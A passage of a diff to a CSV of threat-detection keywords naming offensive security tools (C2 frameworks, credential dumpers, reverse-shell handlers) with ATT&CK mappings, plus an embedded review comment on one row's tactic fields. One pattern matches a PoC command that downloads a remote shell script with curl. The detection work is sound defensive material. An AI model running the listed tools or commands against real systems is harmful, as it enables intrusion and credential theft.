Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*PyExec-main.*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*pygpoabuse * -hashes lm:* -gpo-id *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*pygpoabuse.py*","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","8","2","178","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" +"*pygpoabuse.py*","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","8","2","180","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" "*pyherion.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","0","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" +"*pyinstaller netexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*pyLAPS.py --action get -d * -u * -p * --dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*pyLAPS-main*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" 
"*pyMalleableC2*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" 
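Review bot: The added `*pyinstaller netexec.spec*` row has ATT&CK fields that do not agree with each other: it lists `T1021` (Remote Services) but the tactic field `TA0007 - TA0003 - TA0002 - TA0001` has no Lateral Movement entry, and the category is `Credential Access` while TA0006 is absent. None of the four listed techniques appears to map to TA0002 or TA0001, so a tactic field such as `"TA0007 - TA0003 - TA0008"` would match the techniques better, with the category aligned or a credential-access technique added. The `*pwn3d_label = Pwn3d!*` row added in the previous hunk carries the same values and needs the same correction. Separately, the keyword matches only the exact build command with a single space and a bare file name, so `*pyinstaller*netexec.spec*` would keep matching when options or a path are present. A severity of `10` also looks high for a packaging step rather than tool execution.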
@@ -15423,7 +15593,7 @@ "*pypykatz.lsadecryptor*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*pypykatz.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*pypykatz.registry*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*pypykatz_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*pypykatz_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*pypykatz_rekall.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*pypykatzClass*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - 
T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*pypykatzfile*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" 
@@ -15450,11 +15620,11 @@ "*python st.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*python tinar.py*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*python* pachine.py*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" -"*python*charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*python*charlotte.py*","offensive_tool_keyword","charlotte","c++ fully 
undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*python*http://*:6970/ConfigFileCacheList.txt*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python*'http://*SEP*:6970/*.cnf.xml*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python*https://*:8443/cucm-uds/users?name=*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"*python_modules/keyboard.zip*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*python_modules/keyboard.zip*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*python2??/generator.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python2??/PyLoader.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3 ./exp.py --url http://*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" 
@@ -15462,43 +15632,43 @@ "*python3 gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" "*python3 GetHash.py NtCreateFile*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*python3 -m orbitaldump *","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" -"*python3 -m S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*python3 -m S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" "*python3 Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - 
TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*python3 pacu.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*python3 pacu.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*python3 rsf.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*python3 scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*python3 sitadel*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*python3 st client wss://*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*python3 st.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*python3*.exe .\nxc*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*python3*.exe .\nxc*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*python3??/generator.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3??/PyLoader.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" -"*python3_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*python3_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*python3_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 